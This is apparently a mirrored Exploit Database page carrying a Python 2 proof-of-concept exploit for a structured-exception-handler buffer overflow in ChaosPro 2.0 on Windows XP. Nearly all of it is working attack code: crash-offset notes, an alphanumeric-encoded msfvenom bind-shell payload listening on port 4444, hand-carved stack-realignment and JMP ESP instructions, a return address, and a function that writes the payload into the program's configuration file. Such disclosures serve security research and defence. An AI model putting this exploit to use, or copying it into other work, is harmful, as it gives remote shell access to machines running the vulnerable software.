ChaosPro 2.0 – Buffer Overflow (SEH)

• Exploit Database
• 120 阅读

• 作者： SYANiDE
  日期： 2019-10-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47551/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177

  # Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH) # Date: 2019-10-27 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://www.chaospro.de/ # Software link: http://www.chaospro.de/cpro20.zip # Version: 2.0 # Tested on: Windows XP Pro OEM   #!/usr/bin/env python2 import os, sys     # sploit = "A"* 5000## Crash! 41414141 in SEH! via ProfilePath or PicturePath.Windows XP OEM # <code>locate pattern_create.rb | head -n 1</code> 5000#326d4431 # <code>locate pattern_offset.rb | head -n 1</code> 326d4431 5000#2705 # sploit = "A" * (2705 -4 - 126)# 2575 # sploit = (pattern_create) # <code>locate pattern_create.rb|head -n 1</code> 2575 # 0012F51C dump is 61354161, or 61413561 in LE # <code>locate pattern_offset.rb|head -n 1</code> 61413561 2575 # 16     ################ Second stage #################### sploit = "A"*16 #msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c sploit += ( "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70" "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50" "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b" "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50" "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c" "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b" "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30" "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b" "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70" "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63" "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f" "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b" "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d" "\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77" "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78" "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a" "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31" "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52" "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63" "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43" "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f" "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f" "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30" "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49" "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f" "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73" "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76" "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a" "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f" "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b" "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d" "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47" "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56" "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58" "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44" "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42" "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56" "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69" "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f" "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a" "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46" "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31" "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b" "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69" "\x6f\x39\x45\x41\x41" ) # 710 bytes sploit += "A" * (2575 - 16 - 710)     ################ First stage ####################   # ESP: 0012E75C # ESP target: 0012FF98 ## Need to align to four-byte and 16-byte boundaries: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc # 282.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc # 1551.0000 # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc # 183C # 0012FF32 54 PUSH ESP # 0012FF33 58 POP EAX # 0012FF34 66:05 3C18 ADD AX,183C # 0012FF38 50 PUSH EAX # 0012FF39 5C POP ESP sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8     # target instruction to push onto stack at new ESP:FFE4 JMP ESP # 4141E4FF # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803 #0: 25 28 28 28 28 andeax,0x28282828 #5: 25 47 47 47 47 andeax,0x47474747 #a: 2d 7f 01 7f 7f subeax,0x7f7f017f #f: 2d 7f 01 01 01 subeax,0x101017f # 14: 2d 03 18 3e 3e subeax,0x3e3e1803 # 19: 50 push eax sploit += ( "\x25\x28\x28\x28\x28" "\x25\x47\x47\x47\x47" "\x2d\x7f\x01\x7f\x7f" "\x2d\x7f\x01\x01\x01" "\x2d\x03\x18\x3e\x3e" "\x50" ) # 26 bytes   ## Realign new ESP with beginning of overflow buffer: ## New ESP should be four-byte and 16-byte aligned: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc # 122.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc # 671.0000 # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc # A7C ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we&apos;re trying to sled into (keep the sled clean) # 0012FF54 44 INC ESP # 0012FF55 44 INC ESP # 0012FF56 44 INC ESP # 0012FF57 44 INC ESP # 0012FF58 44 INC ESP # 0012FF59 44 INC ESP # 0012FF5A 44 INC ESP # 0012FF5B 44 INC ESP sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8   ## Going to have to carve out the address 0012F51C # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864 # 0: 25 02 02 02 02 andeax,0x2020202 # 5: 25 51 51 51 51 andeax,0x51515151 # a: 2d 7f 01 7f 7f subeax,0x7f7f017f # f: 2d 01 01 01 61 subeax,0x61010101 #14: 2d 64 08 6d 1f subeax,0x1f6d0864 #19: 50 push eax sploit +=( "\x25\x02\x02\x02\x02" "\x25\x51\x51\x51\x51" "\x2d\x7f\x01\x7f\x7f" "\x2d\x01\x01\x01\x61" "\x2d\x64\x08\x6d\x1f" "\x50" ) # 26 bytes   ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP # 5C POP ESP sploit += "\x5c" # 1   sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)   ################ RET from SEH: JMP SHORT - 126 ####################   sploit += "\xeb\x80" + "\x41\x41" # 4 # 00401B44|. 5F POP EDI # 00401B45|> 5E POP ESI # 00401B46\. C3 RETN sploit += "\x44\x1b\x40\x00"     ################ build the config #################### ## Running from just outside base directory of ChaosPro:   def ret_cfg(inp): # do it live in PicturePath cfg = """PicturePath %s""" % inp with open("chaospro\\ChaosPro.cfg",&apos;w&apos;) as F: F.write(cfg) F.close()   ret_cfg(sploit)